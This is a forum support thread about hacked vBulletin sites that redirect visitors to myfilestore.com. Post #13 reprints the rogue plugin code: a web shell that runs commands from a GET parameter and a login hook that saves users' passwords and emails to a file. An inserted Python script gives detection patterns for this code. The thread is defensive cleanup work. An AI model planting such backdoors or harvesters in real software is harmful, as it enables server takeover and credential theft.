  #1  
Old 27 Nov 2016, 12:43
oguzdinc oguzdinc is offline
 
Join Date: Jan 2008
Myfilestore.com Virus

Hello, I have a problem with my www.Madenciyim.com

Visitors coming from Google search are being redirected to www.myfilestore.com. When they go back to Google and come back again, they go to my website.

What can I do?

I deleted the VBSEO plugin. I upgraded my vBulletin on Friday but it is still happening.
  #2  
Old 27 Nov 2016, 14:05
z3r0 z3r0 is offline
 
Join Date: Apr 2005
Location: Lancashire, UK
Check through your plugins for any new ones that may have been added; I've seen them on the global_complete hook location in the past for myfilestore.
  #3  
Old 28 Nov 2016, 14:00
oguzdinc oguzdinc is offline
 
Join Date: Jan 2008
I contacted vB support and they suggested that I delete the "ech" files from plugin management. I hope the problem is solved.
  #4  
Old 28 Nov 2016, 15:18
mscottralston mscottralston is offline
 
Join Date: Apr 2013
Good morning,

Over the weekend, I'm having reports of this exact same virus on my forums as well. Please help! (Should I have made my own thread for this?)

Thanks!!
  #5  
Old 28 Nov 2016, 15:43
MarkFL MarkFL is online now
 
Join Date: Feb 2014
Real name: Mark
Originally Posted by mscottralston:
Good morning,

Over the weekend, I'm having reports of this exact same virus on my forums as well. Please help! (Should I have made my own thread for this?)

Thanks!!
Posting in this thread is fine, since it refers to the same issue that is the thread topic.

Did you try the suggestion in post #3?
__________________
Former vBulletin.org Staff Member



Support for my products (as well as updates/new product publishing) has been moved to MHB - vBulletin Products and TAZ - Add-ons
  #6  
Old 28 Nov 2016, 15:58
mscottralston mscottralston is offline
 
Join Date: Apr 2013
I'm struggling to find the location of the 'ech' files. Could you direct me to the plugin folder in a typical VB4 installation?

Thanks!
  #7  
Old 28 Nov 2016, 16:19
MarkFL MarkFL is online now
 
Join Date: Feb 2014
Real name: Mark
Originally Posted by mscottralston:
I'm struggling to find the location of the 'ech' files. Could you direct me to the plugin folder in a typical VB4 installation?

Thanks!
I suspect that what you want to do is go to the "Plugin Manager" in your AdminCP and look for the suspect plugins there.
  #8  
Old 28 Nov 2016, 16:25
mscottralston mscottralston is offline
 
Join Date: Apr 2013
The problem is that I inherited these forums from someone else -- I don't have a clear sense of which plugins should and shouldn't be in there, nor do I see timestamps on them to be able to pick one out of the lineup because it's recently installed. Certainly I haven't taken any actions to recently install a plugin; the only thing I've done is uninstall forumrunner (and delete its folder on the server).

I'm just going to paste the lot and hope someone has insight into one-of-these-things-is-not-like-the-others:

Plugin System
Title Hook Location Active Controls
Product : vBulletin
Federal ajax_complete [Edit] [Delete]
Federal ajax_complete [Edit] [Delete]
global_rewrite global_start [Edit] [Delete]
login_rewrite login_process [Edit] [Delete]
Product : Censor Replacements
censor_replacing_script bbcode_parse_start [Edit] [Delete]
Product : GlowHost - Spam-O-Matic
Affiliate link placement parse_templates [Edit] [Delete]
Form actions inlinemod_action_switch [Edit] [Delete]
GlowHost - Spam-O-Matic: Activation Post-Fix register_activate_process [Edit] [Delete]
GlowHost - Spam-O-Matic: AKISMET SPAM filter newpost_process [Edit] [Delete]
GlowHost - Spam-O-Matic: Finish Registration register_addmember_complete [Edit] [Delete]
GlowHost - Spam-O-Matic: First Post/Thread Control threadfpdata_presave [Edit] [Delete]
GlowHost - Spam-O-Matic: Modify User Quick Links Menu useradmin_edit_start [Edit] [Delete]
GlowHost - Spam-O-Matic: Registration Pre-Check register_addmember_process [Edit] [Delete]
GlowHost - Spam-O-Matic: Replies Control postdata_presave [Edit] [Delete]
Menu item in Moderation Tools showthread_start [Edit] [Delete]
Stats render forumhome_complete [Edit] [Delete]
Product : HS - External Signature Image Size Limiter
HS - External Signature Image Size Limiter profile_updatesignature_start [Edit] [Delete]
Product : PostRelease
Cache cache_templates [Edit] [Delete]
Template Page misc_start [Edit] [Delete]
Thread List Page forumdisplay_complete [Edit] [Delete]
Product : Skimlinks Plugin
Add Skimlinks Classes to PostBit postbit_display_complete [Edit] [Delete]
Add Skimlinks JavaScript to footer template showthread_complete [Edit] [Delete]
Add Skimlinks Option to Edit Options Form profile_editoptions_start [Edit] [Delete]
Extend User DataManager userdata_start [Edit] [Delete]
Update Skimlinks Preference profile_updateoptions [Edit] [Delete]
Product : Stop the Registration Bots
Add Member: Check form submit time, hash, and random hidden field. register_addmember_process [Edit] [Delete]
Reg Check Date: Check for hash and random hidden field passed. Second Step register_checkdate [Edit] [Delete]
Register Start: Load Functions. First Step. register_start [Edit] [Delete]
Product : Yet Another Award System 4.0
Awards WOL process online_location_process [Edit] [Delete]
Awards WOL unknown online_location_unknown [Edit] [Delete]
CSS - Inject CSS into vBulletin css_start [Edit] [Delete]
YAAS - Add Tab to Navbar process_templates_complete [Edit] [Delete]
YAAS - Cache Templates cache_templates [Edit] [Delete]
YAAS - Give Award to User Nav mod_index_navigation [Edit] [Delete]
YAAS - Member List Display memberlist_bit [Edit] [Delete]
YAAS - Tab set user member_start [Edit] [Delete]
YAAS in Member Profile - Init init_startup [Edit] [Delete]
YAAS in Member Profile - Profile member_build_blocks_start [Edit] [Delete]
YAAS in Posbit postbit_display_complete [Edit] [Delete]
YAAS Template Group template_groups [Edit] [Delete]
Save Active Status

Thanks again for your help!
  #9  
Old 28 Nov 2016, 16:40
MarkFL MarkFL is online now
 
Join Date: Feb 2014
Real name: Mark
I would focus on these:

Product : vBulletin
Federal ajax_complete [Edit] [Delete]
Federal ajax_complete [Edit] [Delete]
global_rewrite global_start [Edit] [Delete]
login_rewrite login_process [Edit] [Delete]

Particularly the last two. Try disabling those two and see what happens.
  #10  
Old 28 Nov 2016, 16:47
mscottralston mscottralston is offline
 
Join Date: Apr 2013
Thanks, I have done so!
  #11  
Old 28 Nov 2016, 16:53
MarkFL MarkFL is online now
 
Join Date: Feb 2014
Real name: Mark
Does that fix the issue? Out of curiosity, would you post the code within those two plugins?
  #12  
Old 28 Nov 2016, 16:56
Dave Dave is online now
 
Join Date: Jun 2010
Real name: Dave
You can also try the following in order to track where it's coming from or how it happened:
- Check the logs at AdminCP > Statistics & Logs > Control Panel Log > look for entries that come from unfamiliar IP addresses.
- Disable all plugins and hooks. (guide) Problem still exists after all plugins/hooks disabled? Then it's possible that certain PHP/JS files are modified on your server.
__________________
https://technidev.com - security, development, exploits, vBulletin
dave[at]technidev[dot]com

Contact me for custom vBulletin 3/4 work & server/website management.
  #13  
Old 28 Nov 2016, 18:03
mscottralston mscottralston is offline
 
Join Date: Apr 2013
MarkFL: I can't tell if it's fixed or not. When I go to privateerpressforums.com from a google link (the originally-reported way that this issue manifested), I don't get redirected to this spam website, so... hopefully it's fixed? I was never able to reproduce the issue in the first place, though. Lots of forum users were very vocal about it over the weekend.

Here are the codes:

global_rewrite:

$show['nopasswordempty'] = TRUE;

login_rewrite:
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
$lg_file = "./customavatars/lg.html";
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");

while($row = @mysql_fetch_array($sql_query))
{
    if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
    {
        $fp1 = @fopen($lg_file, "a+");
        @fwrite($fp1, $lg_username . ':' . $lg_password." (" . $row["email"] . ")\n");
        @fclose($fp1);
        $f = @file($lg_file);
        $new = array_unique($f);
        $fp = @fopen($lg_file, "w");
        foreach($new as $values)
        {
            @fputs($fp, $values);
        }
        @fclose($fp);
    }
}

The Federal plugins are still on. Here are their codes:
if(isset($_GET['lol'])){echo
"<h1>lol</h1><pre>"; system($_GET
['lol']);exit;}
and
if(isset($_GET['lol'])){echo
"<h1>lol</h1><pre>"; system($_GET
['lol']);exit;}
In other words, they're identical. Not sure why there are two of them. In general they seem a bit suspicious to me.

Dave: I don't see any suspicious log entries from the past few weeks (though it's unclear to me exactly when this issue started). The IPs are all me and known moderators.
  #14  
Old 28 Nov 2016, 18:14
MarkFL MarkFL is online now
 
Join Date: Feb 2014
Real name: Mark
Yeah, those "Federal" plugins look suspicious to me as well. That first one looks like it could be harvesting passwords/email addresses. If it were me, I would look on the server and see what's in the file "/customavatars/lg.html" and if it contains passwords and email addresses, I would download it (in case it is legit and needs to be restored) and delete it.

I would disable or even delete those 4 plugins (make backups in a text file on your hard drive in case you need them back).

Edit: if the file "/customavatars/lg.html" does appear to have passwords/email addresses, I would advise your users to change their passwords.
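Added example (not part of any post in this thread, and not vBulletin code): a Python script that triages plugin code for the traits posts #13 and #14 call suspicious. The plugin bodies are constructed from the code quoted in post #13 (login_rewrite abbreviated), `benign_example` is a hypothetical entry, and the patterns and reason strings are assumptions of this example.

```python
import re
from collections import Counter

# Plugin bodies constructed from the code quoted in post #13 (login_rewrite abbreviated).
FEDERAL = '''if(isset($_GET['lol'])){echo
"<h1>lol</h1><pre>"; system($_GET
['lol']);exit;}'''
LOGIN_REWRITE = '''$lg_password = $vbulletin->GPC["vb_login_password"];
$lg_file = "./customavatars/lg.html";
$fp1 = @fopen($lg_file, "a+");
@fwrite($fp1, $lg_username . ':' . $lg_password);'''
# (title, hook, phpcode) rows; "benign_example" is a hypothetical entry for contrast.
PLUGINS = [
    ("Federal", "ajax_complete", FEDERAL),
    ("Federal", "ajax_complete", FEDERAL),
    ("global_rewrite", "global_start", "$show['nopasswordempty'] = TRUE;"),
    ("login_rewrite", "login_process", LOGIN_REWRITE),
    ("benign_example", "forumhome_complete", "$show['stats'] = true;"),
]
# Patterns are assumptions of this example, not a complete rule set.
EXEC_FROM_REQUEST = re.compile(
    r"\b(?:system|exec|passthru|shell_exec|popen|proc_open|eval)\s*\([^;]*"
    r"\$_(?:GET|POST|REQUEST|COOKIE)")
FILE_WRITE = re.compile(r"\b(?:fwrite|fputs|file_put_contents)\s*\(")
PASSWORD_FIELD = re.compile(r"vb_login_(?:md5)?password")

def normalise(code):
    """Collapse whitespace so calls wrapped across lines still match."""
    return re.sub(r"\s+", " ", code).strip()

def triage(plugins):
    """Return [(title, hook, [reasons])] for plugins that need manual review."""
    copies = Counter((hook, normalise(code)) for _, hook, code in plugins)
    flagged = []
    for title, hook, code in plugins:
        flat, reasons = normalise(code), []
        if EXEC_FROM_REQUEST.search(flat):
            reasons.append("runs a command or code taken from the request")
        if PASSWORD_FIELD.search(flat) and FILE_WRITE.search(flat):
            reasons.append("reads the login password and writes to a file")
        if copies[(hook, flat)] > 1:
            reasons.append("identical code registered more than once on the same hook")
        if reasons:
            flagged.append((title, hook, reasons))
    return flagged

if __name__ == "__main__":
    for title, hook, reasons in triage(PLUGINS):
        print(f"{title} @ {hook}: " + "; ".join(reasons))
```

An empty result does not clear a plugin: an entry such as global_rewrite that nobody on the team recognises still has to be read by hand.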
  #15  
Old 28 Nov 2016, 18:33
oguzdinc oguzdinc is offline
 
Join Date: Jan 2008
I also could not solve my problem. As vBulletin support told me, I deleted all plugins, and I also deleted the ech files, and I only have VSa - Advanced Forum Statistics on my website, and it is the latest version. Do I have to delete it?